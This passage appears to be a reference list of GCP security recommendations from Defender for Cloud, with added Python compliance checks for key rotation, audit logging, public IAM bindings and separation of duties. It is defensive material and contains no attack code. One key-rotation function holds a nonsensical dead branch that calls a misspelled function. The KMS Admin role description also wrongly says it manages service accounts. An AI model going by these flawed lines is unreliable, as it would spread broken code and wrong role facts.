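next rotation time in RFC 3339 form; the key records are constructed samples
shaped after the Cloud KMS CryptoKey fields rotationPeriod and nextRotationTime.
"""
from datetime import datetime, timedelta, timezone

MAX_ROTATION = timedelta(days=90)
_UNITS = {"s": "seconds", "m": "minutes", "h": "hours", "d": "days"}

# Fixed "now" so the constructed samples evaluate the same way every run.
NOW = datetime(2024, 1, 1, tzinfo=timezone.utc)


def parse_rotation_period(text):
    """'7776000s', '90d' or '2160h' -> timedelta; raises ValueError on malformed input."""
    text = text.strip()
    if len(text) < 2 or text[-1] not in _UNITS or not text[:-1].isdigit():
        raise ValueError(f"bad rotation period: {text!r}")
    return timedelta(**{_UNITS[text[-1]]: int(text[:-1])})


def parse_rfc3339(text):
    """Parse an RFC 3339 timestamp such as '2024-03-01T00:00:00Z' into an aware datetime."""
    return datetime.fromisoformat(text.replace("Z", "+00:00"))


def rotation_findings(key, now):
    """Return the problems with a key's rotation schedule (empty list when compliant)."""
    problems = []
    period = key.get("rotationPeriod")
    if not period:
        problems.append("no rotation period set")
    else:
        try:
            if parse_rotation_period(period) > MAX_ROTATION:
                problems.append(f"rotation period {period} exceeds 90 days")
        except ValueError as exc:
            problems.append(str(exc))

    # The period only takes effect from the next scheduled rotation, so a key whose
    # next rotation lies more than 90 days out is also flagged.
    next_rot = key.get("nextRotationTime")
    if not next_rot:
        problems.append("no next rotation time set")
    elif parse_rfc3339(next_rot) - now > MAX_ROTATION:
        problems.append(f"next rotation {next_rot} is more than 90 days away")
    return problems


# Constructed sample keys; the resource names are placeholders.
COMPLIANT_KEY = {
    "name": "projects/example-project/locations/global/keyRings/example-ring/cryptoKeys/k1",
    "rotationPeriod": "7776000s",            # exactly 90 days, as the API reports it
    "nextRotationTime": "2024-03-01T00:00:00Z",
}
SLOW_KEY = {
    "name": "projects/example-project/locations/global/keyRings/example-ring/cryptoKeys/k2",
    "rotationPeriod": "180d",
    "nextRotationTime": "2024-09-01T00:00:00Z",
}
UNSCHEDULED_KEY = {
    "name": "projects/example-project/locations/global/keyRings/example-ring/cryptoKeys/k3",
}


if __name__ == "__main__":
    for key in (COMPLIANT_KEY, SLOW_KEY, UNSCHEDULED_KEY):
        print(key["name"].rsplit("/", 1)[-1], rotation_findings(key, NOW) or "ok")
```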


Recommendation: Ensure log metric filter and alerts exist for project ownership assignments/changes
Severity: Low
Description:
In order to prevent unnecessary project ownership assignments to users/service accounts and further misuse of projects and resources, all "roles/Owner" assignments should be monitored.

Members (users/service accounts) with a role assignment to the primitive role "roles/Owner" are project owners. The project owner has all the privileges on the project the role belongs to. These are summarized below:

- All viewer permissions on all GCP services within the project
- Permissions for actions that modify the state of all GCP services within the project
- Manage roles and permissions for a project and all resources within the project
- Set up billing for a project

Granting the owner role to a member (user/service account) will allow that member to modify the Identity and Access Management (IAM) policy. Therefore, grant the owner role only if the member has a legitimate purpose to manage the IAM policy. This is because the project IAM policy contains sensitive access control data. Having a minimal set of users allowed to manage the IAM policy will simplify any auditing that may be necessary.

Project ownership has the highest level of privileges on a project. To avoid misuse of project resources, the following project ownership assignment/change actions should be monitored and alerted to the concerned recipients:

- Sending project ownership invites
- Acceptance/rejection of a project ownership invite by a user
- Adding roles/owner to a user/service account
- Removing a user/service account from roles/owner

Recommendation: Ensure oslogin is enabled for a Project
Severity: Medium
Description:
Enabling OS Login binds SSH certificates to IAM users and facilitates effective SSH certificate management.

Enabling OS Login ensures that SSH keys used to connect to instances are mapped to IAM users. Revoking access for an IAM user will revoke all the SSH keys associated with that particular user. It facilitates centralized and automated SSH key pair management, which is useful in handling cases like response to compromised SSH key pairs and/or revocation of external/third-party/vendor users.

To find out which instance causes the project to be unhealthy, see the recommendation "Ensure oslogin is enabled for all instances".
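The three "log metric filter and alerts" recommendations (Cloud Storage IAM permission changes, SQL instance configuration changes, and the project ownership changes just described) each reduce to a condition over Cloud Audit Log entries. The following added example, not code from the Defender for Cloud documentation, expresses those conditions in Python over exported audit-log JSON so they can be tested against sample entries; the entry shape follows the Cloud Audit Logs AuditLog format (protoPayload.serviceName, methodName, serviceData.policyDelta.bindingDeltas, resource.type), and the entries, principals and resource names are constructed placeholders.

```python
"""Detection logic for the three "log metric filter and alerts" recommendations
above: project ownership changes, Cloud Storage bucket IAM changes and Cloud SQL
instance configuration changes.

Added example, not part of the Defender for Cloud documentation. Each predicate is
the condition a Cloud Logging metric filter for that recommendation would express,
written over AuditLog-shaped entries already exported as JSON. All entries below
are constructed samples.
"""
import json


def _binding_deltas(entry):
    """IAM binding changes recorded in a SetIamPolicy audit entry (may be empty)."""
    return (entry.get("protoPayload", {}).get("serviceData", {})
                 .get("policyDelta", {}).get("bindingDeltas", []))


def is_project_ownership_change(entry):
    """roles/owner added or removed on a project, or an ownership invite sent/answered."""
    payload = entry.get("protoPayload", {})
    if payload.get("serviceName") != "cloudresourcemanager.googleapis.com":
        return False
    text = json.dumps(entry)  # invite events carry these markers in their payload
    if "ProjectOwnership" in text or "projectOwnerInvitee" in text:
        return True
    return any(d.get("role") == "roles/owner" and d.get("action") in ("ADD", "REMOVE")
               for d in _binding_deltas(entry))


def is_bucket_iam_change(entry):
    """IAM policy set on a Cloud Storage bucket."""
    return (entry.get("resource", {}).get("type") == "gcs_bucket"
            and entry.get("protoPayload", {}).get("methodName") == "storage.setIamPermissions")


def is_sql_config_change(entry):
    """Cloud SQL instance settings updated (backups, authorized networks, flags, ...)."""
    return entry.get("protoPayload", {}).get("methodName") == "cloudsql.instances.update"


DETECTIONS = [
    ("project-ownership-change", is_project_ownership_change),
    ("storage-bucket-iam-change", is_bucket_iam_change),
    ("sql-instance-config-change", is_sql_config_change),
]


def classify(entry):
    """Names of every detection an entry triggers (empty list when none)."""
    return [name for name, pred in DETECTIONS if pred(entry)]


def alerts(entries):
    """Map detection name -> [(principal, resource)] for the entries that fired."""
    out = {name: [] for name, _ in DETECTIONS}
    for entry in entries:
        payload = entry.get("protoPayload", {})
        who = payload.get("authenticationInfo", {}).get("principalEmail", "?")
        for name in classify(entry):
            out[name].append((who, payload.get("resourceName", "?")))
    return out


def make_entry(resource_type, service, method, principal, resource_name, deltas=None):
    """Build a minimal AuditLog-shaped entry; used only for the constructed samples."""
    payload = {"serviceName": service, "methodName": method, "resourceName": resource_name,
               "authenticationInfo": {"principalEmail": principal}}
    if deltas is not None:
        payload["serviceData"] = {"policyDelta": {"bindingDeltas": deltas}}
    return {"resource": {"type": resource_type}, "protoPayload": payload}


SAMPLE_ENTRIES = [
    # roles/owner granted on a project via SetIamPolicy
    make_entry("project", "cloudresourcemanager.googleapis.com", "SetIamPolicy",
               "admin@example.com", "projects/example-project",
               [{"action": "ADD", "role": "roles/owner", "member": "user:new-owner@example.com"}]),
    # constructed invite event: matched through the ProjectOwnership marker in its text
    make_entry("project", "cloudresourcemanager.googleapis.com", "InsertProjectOwnershipInvite",
               "owner@example.com", "projects/example-project"),
    # bucket IAM policy rewritten
    make_entry("gcs_bucket", "storage.googleapis.com", "storage.setIamPermissions",
               "dev@example.com", "projects/_/buckets/example-bucket"),
    # Cloud SQL instance settings changed
    make_entry("cloudsql_database", "cloudsql.googleapis.com", "cloudsql.instances.update",
               "dba@example.com", "projects/example-project/instances/example-mysql"),
    # benign: a viewer role granted, which should fire nothing
    make_entry("project", "cloudresourcemanager.googleapis.com", "SetIamPolicy",
               "admin@example.com", "projects/example-project",
               [{"action": "ADD", "role": "roles/viewer", "member": "user:auditor@example.com"}]),
]


if __name__ == "__main__":
    for name, hits in alerts(SAMPLE_ENTRIES).items():
        print(name, hits)
```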


Recommendation: Ensure oslogin is enabled for all instances
Severity: Medium
Description:
Enabling OS Login binds SSH certificates to IAM users and facilitates effective SSH certificate management.

Enabling OS Login ensures that SSH keys used to connect to instances are mapped to IAM users. Revoking access for an IAM user will revoke all the SSH keys associated with that particular user. It facilitates centralized and automated SSH key pair management, which is useful in handling cases like response to compromised SSH key pairs and/or revocation of external/third-party/vendor users.

Recommendation: Ensure that Cloud Audit Logging is configured properly across all services and all users from a project
Severity: Medium
Description:
It is recommended that Cloud Audit Logging is configured to track all admin activities and read/write access to user data.

Cloud Audit Logging maintains two audit logs for each project, folder, and organization: Admin Activity and Data Access.

1. Admin Activity logs contain log entries for API calls or other administrative actions that modify the configuration or metadata of resources. Admin Activity audit logs are enabled for all services and cannot be configured.
2. Data Access audit logs record API calls that create, modify, or read user-provided data. These are disabled by default and should be enabled.

There are three kinds of Data Access audit log information:

- Admin read: records operations that read metadata or configuration information. (Admin Activity audit logs record writes of metadata and configuration information and cannot be disabled.)
- Data read: records operations that read user-provided data.
- Data write: records operations that write user-provided data.

It is recommended to have an effective default audit config configured in such a way that:

1. The log type is set to DATA_READ (to log user activity) and DATA_WRITE (to log changes to or tampering with user data).
2. The audit config is enabled for all the services supported by the Data Access audit logs feature.
3. Logs are captured for all users, i.e., there are no exempted users in any of the audit config sections. This ensures that overriding the audit config will not contradict the requirement.
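The three conditions above map directly onto the auditConfigs section of a project's IAM policy: a default entry for allServices carrying DATA_READ and DATA_WRITE, and no exemptedMembers in any entry, including per-service overrides. The following added example, not code from the Defender for Cloud documentation, checks a policy document for exactly that; the policies are constructed samples and the member names are placeholders.

```python
"""Check a project's audit configuration against the three conditions described
above: DATA_READ and DATA_WRITE enabled, for all services, with no exempted members.

Added example, not part of the Defender for Cloud documentation. The policy
documents are constructed samples shaped like the auditConfigs section of a
Cloud IAM policy (service, auditLogConfigs[].logType, exemptedMembers).
"""

REQUIRED_LOG_TYPES = {"DATA_READ", "DATA_WRITE"}


def audit_config_findings(policy):
    """Return a list of findings for the policy's auditConfigs; empty means compliant."""
    findings = []
    configs = policy.get("auditConfigs", [])

    # Condition 1 and 2: the default (allServices) section must enable both data log types.
    default = next((c for c in configs if c.get("service") == "allServices"), None)
    if default is None:
        findings.append("no default audit config for allServices")
    else:
        enabled = {c.get("logType") for c in default.get("auditLogConfigs", [])}
        for missing in sorted(REQUIRED_LOG_TYPES - enabled):
            findings.append(f"{missing} is not enabled for allServices")

    # Condition 3: an exemption in any section, default or per-service override,
    # means some user's access would go unlogged.
    for cfg in configs:
        for log_cfg in cfg.get("auditLogConfigs", []):
            for member in log_cfg.get("exemptedMembers", []):
                findings.append(
                    f"{member} is exempted from {log_cfg.get('logType')} on {cfg.get('service')}")
    return findings


# Constructed sample policies; only the auditConfigs part is shown.
COMPLIANT_POLICY = {
    "auditConfigs": [
        {"service": "allServices",
         "auditLogConfigs": [{"logType": "ADMIN_READ"}, {"logType": "DATA_READ"}, {"logType": "DATA_WRITE"}]},
    ],
}

GAPPY_POLICY = {
    "auditConfigs": [
        {"service": "allServices",
         "auditLogConfigs": [{"logType": "DATA_WRITE"}]},
        # per-service override that carves a CI account out of read logging
        {"service": "storage.googleapis.com",
         "auditLogConfigs": [{"logType": "DATA_READ", "exemptedMembers": ["user:ci@example.com"]}]},
    ],
}


if __name__ == "__main__":
    for label, policy in (("compliant", COMPLIANT_POLICY), ("gappy", GAPPY_POLICY)):
        print(label, audit_config_findings(policy) or "ok")
```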


Recommendation: Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible
Severity: High
Description:
It is recommended that the IAM policy on Cloud KMS "cryptokeys" restricts anonymous and/or public access. Granting permissions to "allUsers" or "allAuthenticatedUsers" allows anyone to access the dataset. Such access might not be desirable if sensitive data is stored at the location. In this case, ensure that anonymous and/or public access to a Cloud KMS "cryptokey" is not allowed.

Recommendation: Ensure that corporate login credentials are used
Severity: High
Description:
Use corporate login credentials instead of personal accounts, such as Gmail accounts. It is recommended that fully-managed corporate Google accounts be used for increased visibility, auditing, and control of access to Cloud Platform resources. Gmail accounts based outside of the user's organization, such as personal accounts, should not be used for business purposes.
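The public-access recommendations for BigQuery datasets, Cloud Storage buckets, log-sink buckets and Cloud KMS cryptokeys all look for the same two principals, allUsers and allAuthenticatedUsers, in a resource's policy. The following added example, not code from the Defender for Cloud documentation, implements that check for Cloud IAM policy documents and for the BigQuery dataset access list, which uses its own entry format; the policies are constructed samples and the resource and member names are placeholders.

```python
"""Flag IAM policies that grant access to the public principals allUsers or
allAuthenticatedUsers, as described above for BigQuery datasets, Cloud Storage
buckets (including log-sink buckets) and Cloud KMS cryptokeys.

Added example, not part of the Defender for Cloud documentation. The policies are
constructed samples in the Cloud IAM policy shape ({"bindings": [{"role", "members"}]});
BigQuery datasets instead list access entries (access[].specialGroup / iamMember),
which the dataset sample shows. A binding with a condition is still reported, since
the condition only narrows when the public grant applies.
"""

PUBLIC_PRINCIPALS = {"allUsers", "allAuthenticatedUsers"}


def public_bindings(policy):
    """(role, member, has_condition) for each public principal in an IAM policy."""
    hits = []
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            if member in PUBLIC_PRINCIPALS:
                hits.append((binding.get("role"), member, "condition" in binding))
    return hits


def public_dataset_access(dataset):
    """Same check for a BigQuery dataset's access list (specialGroup / iamMember entries)."""
    hits = []
    for entry in dataset.get("access", []):
        principal = entry.get("iamMember") or entry.get("specialGroup")
        if principal in PUBLIC_PRINCIPALS:
            hits.append((entry.get("role"), principal))
    return hits


def is_public(resource):
    """True when an IAM policy or BigQuery dataset document grants any public principal access."""
    return bool(public_bindings(resource) or public_dataset_access(resource))


# Constructed samples; names and e-mail addresses are placeholders.
PUBLIC_BUCKET_POLICY = {"bindings": [
    {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
    {"role": "roles/storage.admin", "members": ["group:data-team@example.com"]},
]}
PUBLIC_KMS_POLICY = {"bindings": [
    {"role": "roles/cloudkms.cryptoKeyDecrypter", "members": ["allAuthenticatedUsers"],
     "condition": {"title": "until-2030",
                   "expression": 'request.time < timestamp("2030-01-01T00:00:00Z")'}},
]}
PUBLIC_DATASET = {"datasetReference": {"datasetId": "example_dataset"}, "access": [
    {"role": "OWNER", "userByEmail": "owner@example.com"},
    {"role": "READER", "specialGroup": "allAuthenticatedUsers"},
]}
PRIVATE_POLICY = {"bindings": [
    {"role": "roles/storage.objectViewer",
     "members": ["group:data-team@example.com",
                 "serviceAccount:etl@example-project.iam.gserviceaccount.com"]},
]}

SAMPLES = [
    ("example-bucket", PUBLIC_BUCKET_POLICY),
    ("example-cryptokey", PUBLIC_KMS_POLICY),
    ("example_dataset", PUBLIC_DATASET),
    ("log-sink-bucket", PRIVATE_POLICY),
]


def public_resources(samples=SAMPLES):
    """Names of the sample resources that grant public access."""
    return [name for name, resource in samples if is_public(resource)]


if __name__ == "__main__":
    for name, resource in SAMPLES:
        print(name, public_bindings(resource) or public_dataset_access(resource) or "private")
```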


Recommendation: Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level
Severity: Medium
Description:
It is recommended to assign the "Service Account User (iam.serviceAccountUser)" and "Service Account Token Creator (iam.serviceAccountTokenCreator)" roles to a user for a specific service account rather than assigning the role to a user at project level.

A service account is a special Google account that belongs to an application or a virtual machine (VM), instead of to an individual end user. The application or VM instance uses the service account to call the service's Google API so that users aren't directly involved. In addition to being an identity, a service account is a resource that has IAM policies attached to it. These policies determine who can use the service account.

Users with IAM roles to update the App Engine and Compute Engine instances (such as App Engine Deployer or Compute Instance Admin) can effectively run code as the service accounts used to run these instances, and indirectly gain access to all the resources to which the service accounts have access. Similarly, SSH access to a Compute Engine instance may also provide the ability to execute code as that instance/service account.

Based on business needs, there could be multiple user-managed service accounts configured for a project. Granting the "iam.serviceAccountUser" or "iam.serviceAccountTokenCreator" roles to a user for a project gives the user access to all service accounts in the project, including service accounts that may be created in the future. This can result in elevation of privileges by using service accounts and the corresponding "Compute Engine instances".

In order to implement "least privileges" best practices, IAM users should not be assigned the "Service Account User" or "Service Account Token Creator" roles at the project level. Instead, these roles should be assigned to a user for a specific service account, giving that user access to the service account. The "Service Account User" role allows a user to bind a service account to a long-running job service, whereas the "Service Account Token Creator" role allows a user to directly impersonate (or assert) the identity of a service account.


Recommendation: Ensure that Separation of duties is enforced while assigning KMS related roles to users
Severity: High
Description:
It is recommended that the principle of 'Separation of Duties' is enforced while assigning KMS related roles to users.

The built-in/predefined IAM role "Cloud KMS Admin" allows the user/identity to create, delete, and manage service account(s). The built-in/predefined IAM role "Cloud KMS CryptoKey Encrypter/Decrypter" allows the user/identity (with adequate privileges on the concerned resources) to encrypt and decrypt data at rest using an encryption key(s). The built-in/predefined IAM role "Cloud KMS CryptoKey Encrypter" allows the user/identity (with adequate privileges on the concerned resources) to encrypt data at rest using an encryption key(s). The built-in/predefined IAM role "Cloud KMS CryptoKey Decrypter" allows the user/identity (with adequate privileges on the concerned resources) to decrypt data at rest using an encryption key(s).

Separation of duties is the concept of ensuring that one individual does not have all the necessary permissions to be able to complete a malicious action. In Cloud KMS, this could be an action such as using a key to access and decrypt data a user should not normally have access to. Separation of duties is a business control typically used in larger organizations, meant to help avoid security or privacy incidents and errors. It is considered best practice.

No user(s) should have "Cloud KMS Admin" and any of the "Cloud KMS CryptoKey Encrypter/Decrypter", "Cloud KMS CryptoKey Encrypter", "Cloud KMS CryptoKey Decrypter" roles assigned at the same time.


Recommendation: Ensure that Separation of duties is enforced while assigning service account related roles to users
Severity: Medium
Description:
It is recommended that the principle of 'Separation of Duties' is enforced while assigning service-account related roles to users.

The built-in/predefined IAM role "Service Account Admin" allows the user/identity to create, delete, and manage service account(s). The built-in/predefined IAM role "Service Account User" allows the user/identity (with adequate privileges on Compute and App Engine) to assign service account(s) to Apps/Compute Instances.

Separation of duties is the concept of ensuring that one individual does not have all the necessary permissions to be able to complete a malicious action. In Cloud IAM service accounts, this could be an action such as using a service account to access resources that the user should not normally have access to. Separation of duties is a business control typically used in larger organizations, meant to help avoid security or privacy incidents and errors. It is considered best practice.

No user should have the "Service Account Admin" and "Service Account User" roles assigned at the same time.

Recommendation: Ensure that Service Account has no Admin privileges
Severity: Medium
Description:
A service account is a special Google account that belongs to an application or a VM, instead of to an individual end user. The application uses the service account to call the service's Google API so that users aren't directly involved.

It's recommended not to use admin access for service accounts. Service accounts represent the service-level security of the resources (application or VM), which is determined by the roles assigned to them. Enrolling a service account with Admin rights gives full access to an assigned application or VM. A holder of service account access can perform critical actions like delete, update, change settings, etc. without user intervention. For this reason, it's recommended that service accounts not have Admin rights.


Recommendation: Ensure that sinks are configured for all log entries

Description: It is recommended to create a sink that will export copies of all the log entries. This can help aggregate logs from multiple projects and export them to a Security Information and Event Management (SIEM).

Log entries are held in Stackdriver Logging. To aggregate logs, export them to a SIEM. To keep them longer, it is recommended to set up a log sink. Exporting involves writing a filter that selects the log entries to export, and choosing a destination in Cloud Storage, BigQuery, or Cloud Pub/Sub.

The filter and destination are held in an object called a sink. To ensure all log entries are exported to sinks, ensure that there is no filter configured for a sink. Sinks can be created in projects, organizations, folders, and billing accounts.

Severity: Low

Recommendation: Ensure that the log metric filter and alerts exist for Audit Configuration changes

Description: Google Cloud Platform (GCP) services write audit log entries to the Admin Activity and Data Access logs to help answer the questions of, "who did what, where, and when?" within GCP projects.

Cloud audit logging records information that includes the identity of the API caller, the time of the API call, the source IP address of the API caller, the request parameters, and the response elements returned by GCP services. Cloud audit logging provides a history of GCP API calls for an account, including API calls made via the console, SDKs, command-line tools, and other GCP services.

Admin activity and data access logs produced by cloud audit logging enable security analysis, resource change tracking, and compliance auditing.

Configuring the metric filter and alerts for audit configuration changes ensures the recommended state of audit configuration is maintained so that all activities in the project are auditable at any point in time.

Severity: Low

Recommendation: Ensure that the log metric filter and alerts exist for Custom Role changes

Description: It is recommended that a metric filter and alarm be established for changes to Identity and Access Management (IAM) role creation, deletion and updating activities.

Google Cloud IAM provides predefined roles that give granular access to specific Google Cloud Platform resources and prevent unwanted access to other resources. However, to cater to organization-specific needs, Cloud IAM also provides the ability to create custom roles. Project owners and administrators with the Organization Role Administrator role or the IAM Role Administrator role can create custom roles. Monitoring role creation, deletion and updating activities will help in identifying any over-privileged role at early stages.

Severity: Low


Recommendation: Ensure user-managed/external keys for service accounts are rotated every 90 days or less

Description: Service Account keys consist of a key ID (Private_key_Id) and Private key, which are used to sign programmatic requests users make to Google cloud services accessible to that particular service account. It is recommended that all Service Account keys are regularly rotated.

Rotating Service Account keys will reduce the window of opportunity for an access key that is associated with a compromised or terminated account to be used. Service Account keys should be rotated to ensure that data cannot be accessed with an old key that might have been lost, cracked, or stolen.

Each service account is associated with a key pair managed by Google Cloud Platform (GCP). It is used for service-to-service authentication within GCP. Google rotates the keys daily.

GCP provides the option to create one or more user-managed (also called external key pairs) key pairs for use from outside GCP (for example, for use with Application Default Credentials). When a new key pair is created, the user is required to download the private key (which is not retained by Google).

With external keys, users are responsible for keeping the private key secure and other management operations such as key rotation. External keys can be managed by the IAM API, gcloud command-line tool, or the Service Accounts page in the Google Cloud Platform Console.

GCP facilitates up to 10 external service account keys per service account to facilitate key rotation.

Severity: Medium

Recommendation: GKE web dashboard should be disabled

Description: This recommendation evaluates the kubernetesDashboard field of the addonsConfig property for the key-value pair, 'disabled': false.

Severity: High

Recommendation: Legacy Authorization should be disabled on GKE clusters

Description: This recommendation evaluates the legacyAbac property of a cluster for the key-value pair, 'enabled': true.

Severity: High

Recommendation: Redis IAM role should not be assigned at the organization or folder level

Description: This recommendation evaluates the IAM allow policy in resource metadata for principals assigned roles/redis.admin, roles/redis.editor, roles/redis.viewer at the organization or folder level.

Severity: High

Recommendation: Service accounts should have restricted project access in a cluster

Description: This recommendation evaluates the config property of a node pool to check if no service account is specified or if the default service account is used.

Severity: High
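A practical check for the key rotation recommendation above, as an added example that is not Defender for Cloud's or Google's code: it takes a key listing in the shape returned by `gcloud iam service-accounts keys list --format json` (name, keyType, validAfterTime), ignores Google-managed key pairs, and reports user-managed keys older than 90 days. The sample keys and the account name are constructed.

```python
"""Flag user-managed service account keys older than 90 days.

Added example; not Defender for Cloud's or Google's code. Keys have the
shape of the IAM API key listing (name, keyType, validAfterTime).
"""
from datetime import datetime, timezone

SA = "projects/example-project/serviceAccounts/app@example-project.iam.gserviceaccount.com"

# Constructed sample listing: one old user-managed key, one recent one and a
# Google-managed key pair, which Google rotates itself.
SAMPLE_KEYS = [
    {"name": f"{SA}/keys/key-old", "keyType": "USER_MANAGED",
     "validAfterTime": "2023-01-10T08:00:00Z"},
    {"name": f"{SA}/keys/key-new", "keyType": "USER_MANAGED",
     "validAfterTime": "2023-06-01T00:00:00Z"},
    {"name": f"{SA}/keys/key-sys", "keyType": "SYSTEM_MANAGED",
     "validAfterTime": "2023-01-01T00:00:00Z"},
]


def parse_rfc3339(stamp):
    """Parse an RFC 3339 timestamp into an aware UTC datetime."""
    # fromisoformat() only accepts a trailing "Z" from Python 3.11 on.
    return datetime.fromisoformat(stamp.replace("Z", "+00:00")).astimezone(timezone.utc)


def stale_keys(keys, now, max_days=90):
    """Return (key name, age in days) for user-managed keys older than max_days.

    now is an RFC 3339 timestamp so that a scan can be replayed against a
    listing captured earlier.
    """
    reference = parse_rf3339(now) if False else parse_rfc3339(now)
    stale = []
    for key in keys:
        if key.get("keyType") != "USER_MANAGED":
            continue  # system-managed key pairs are rotated by Google daily
        age = reference - parse_rfc3339(key["validAfterTime"])
        if age.days > max_days:
            stale.append((key["name"], age.days))
    return stale


def at_key_limit(keys, limit=10):
    """True when the account already holds the 10 user-managed keys GCP
    allows, so no replacement can be created before an old key is deleted."""
    return sum(1 for k in keys if k.get("keyType") == "USER_MANAGED") >= limit


if __name__ == "__main__":
    today = datetime.now(timezone.utc).isoformat()
    for name, days in stale_keys(SAMPLE_KEYS, today):
        print(f"rotate {name}: {days} days old")
    print("at key limit:", at_key_limit(SAMPLE_KEYS))
```

Because `now` is passed in rather than read from the clock, the same listing can be re-evaluated at a fixed point in time, which keeps a compliance report reproducible.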


Recommendation: Users should have least privilege access with granular IAM roles

Description: This recommendation evaluates the IAM policy in resource metadata for any principals assigned roles/Owner, roles/Writer, or roles/Reader.
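The IAM checks above (separation of duties for KMS and service-account roles, Redis roles at organization or folder level, and basic roles instead of granular ones) are all questions about one IAM allow policy, so they can share one evaluator. The Python below is an added example and not Defender for Cloud's or Google's code. It assumes the IAM API binding shape and maps the display names used above to the role IDs roles/cloudkms.admin, roles/cloudkms.cryptoKeyEncrypterDecrypter, roles/cloudkms.cryptoKeyEncrypter, roles/cloudkms.cryptoKeyDecrypter, roles/iam.serviceAccountAdmin and roles/iam.serviceAccountUser; the basic roles are spelled roles/owner, roles/editor and roles/viewer as the API does, rather than roles/Owner, roles/Writer and roles/Reader as written above. The sample policy is constructed.

```python
"""Evaluate a GCP IAM allow policy against the IAM recommendations above.

Added example; not Defender for Cloud's or Google's code. The policy shape
is the IAM API one: {"bindings": [{"role": "...", "members": [...]}]}.
"""
from collections import defaultdict

# Role IDs behind the display names used on the page (assumption).
KMS_ADMIN = "roles/cloudkms.admin"
KMS_KEY_ROLES = {
    "roles/cloudkms.cryptoKeyEncrypterDecrypter",
    "roles/cloudkms.cryptoKeyEncrypter",
    "roles/cloudkms.cryptoKeyDecrypter",
}
SA_ADMIN = "roles/iam.serviceAccountAdmin"
SA_USER = "roles/iam.serviceAccountUser"
REDIS_ROLES = {"roles/redis.admin", "roles/redis.editor", "roles/redis.viewer"}
# Basic roles as the API spells them (the page writes Owner/Writer/Reader).
BASIC_ROLES = {"roles/owner", "roles/editor", "roles/viewer"}

# Constructed sample policy: alice and bob violate separation of duties,
# dave holds a basic role, the ops group holds a Redis role.
SAMPLE_POLICY = {
    "bindings": [
        {"role": "roles/cloudkms.admin", "members": ["user:alice@example.com"]},
        {"role": "roles/cloudkms.cryptoKeyDecrypter",
         "members": ["user:alice@example.com",
                     "serviceAccount:app@example.iam.gserviceaccount.com"]},
        {"role": "roles/iam.serviceAccountAdmin", "members": ["user:bob@example.com"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": ["user:bob@example.com", "user:carol@example.com"]},
        {"role": "roles/owner", "members": ["user:dave@example.com"]},
        {"role": "roles/redis.viewer", "members": ["group:ops@example.com"]},
    ]
}


def roles_by_member(policy):
    """Invert the bindings into {member: set of roles}."""
    held = defaultdict(set)
    for binding in policy.get("bindings", []):
        for member in binding.get("members", []):
            held[member].add(binding["role"])
    return held


def evaluate_policy(policy, scope="project"):
    """Return sorted (check, member) findings for one allow policy.

    scope is the resource the policy is attached to: "organization",
    "folder" or "project". The Redis check only applies at organization
    or folder level, as the recommendation states.
    """
    findings = []
    for member, roles in sorted(roles_by_member(policy).items()):
        if KMS_ADMIN in roles and roles & KMS_KEY_ROLES:
            findings.append(("kms-separation-of-duties", member))
        if SA_ADMIN in roles and SA_USER in roles:
            findings.append(("service-account-separation-of-duties", member))
        if scope in ("organization", "folder") and roles & REDIS_ROLES:
            findings.append(("redis-role-at-org-or-folder", member))
        if roles & BASIC_ROLES:
            findings.append(("basic-role-instead-of-granular", member))
    return findings


if __name__ == "__main__":
    for scope in ("project", "folder"):
        print(scope)
        for check, member in evaluate_policy(SAMPLE_POLICY, scope):
            print(f"  {check}: {member}")
```

Run it against the JSON from `gcloud projects get-iam-policy PROJECT_ID --format json` (or the folder and organization equivalents, passing the matching scope). Note that the evaluator looks at one policy at a time; a principal that holds Service Account Admin on the project and Service Account User on an individual service account would only be caught by merging the policies of both resources first.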


GCP Networking recommendations

There are 45 GCP recommendations in this category.

Recommendation: Cluster hosts should be configured to use only private, internal IP addresses to access Google APIs

Description: This recommendation evaluates whether the privateIpGoogleAccess property of a subnetwork is set to false.

Severity: High

Recommendation: Compute instances should use a load balancer that is configured to use a target HTTPS proxy

Description: This recommendation evaluates if the selfLink property of the targetHttpProxy resource matches the target attribute in the forwarding rule, and if the forwarding rule contains a loadBalancingScheme field set to External.

Severity: Medium

Recommendation: Control Plane Authorized Networks should be enabled on GKE clusters

Description: This recommendation evaluates the masterAuthorizedNetworksConfig property of a cluster for the key-value pair, 'enabled': false.

Severity: High

Recommendation: Egress deny rule should be set on a firewall to block unwanted outbound traffic

Description: This recommendation evaluates whether the destinationRanges property in the firewall is set to 0.0.0.0/0 and the denied property contains the key-value pair, 'IPProtocol': 'all'.

Severity: Low

Recommendation: Ensure Firewall Rules for instances behind Identity Aware Proxy (IAP) only allow the traffic from Google Cloud Loadbalancer (GCLB) Health Check and Proxy Addresses

Description: Access to VMs should be restricted by firewall rules that allow only IAP traffic by ensuring only connections proxied by the IAP are allowed. To ensure that load balancing works correctly, health checks should also be allowed.

IAP ensures that access to VMs is controlled by authenticating incoming requests. However, if the VM is still accessible from IP addresses other than the IAP, it may still be possible to send unauthenticated requests to the instance.

Care must be taken to ensure that load balancer health checks are not blocked, as this would stop the load balancer from correctly knowing the health of the VM and load balancing correctly.

Severity: Medium


Recommendation: Ensure legacy networks do not exist for a project

Description: In order to prevent use of legacy networks, a project should not have a legacy network configured.

Legacy networks have a single network IPv4 prefix range and a single gateway IP address for the whole network. The network is global in scope and spans all cloud regions.

Subnetworks cannot be created in a legacy network and are unable to switch from legacy to auto or custom subnet networks. Legacy networks can have an impact for high network traffic projects and are subject to a single point of contention or failure.

Severity: Medium

Recommendation: Ensure 'log_hostname' database flag for Cloud SQL PostgreSQL instance is set appropriately

Description: PostgreSQL logs only the IP address of the connecting hosts. The "log_hostname" flag controls the logging of "hostnames" in addition to the IP addresses logged. The performance hit is dependent on the configuration of the environment and the host name resolution setup. This parameter can only be set in the "postgresql.conf" file or on the server command line.

Logging hostnames can incur overhead on server performance as for each statement logged, DNS resolution will be required to convert IP address to hostname. Depending on the setup, this may be non-negligible. Additionally, the IP addresses that are logged can be resolved to their DNS names later when reviewing the logs, excluding the cases where dynamic hostnames are used.

This recommendation is applicable to PostgreSQL database instances.

Severity: Low
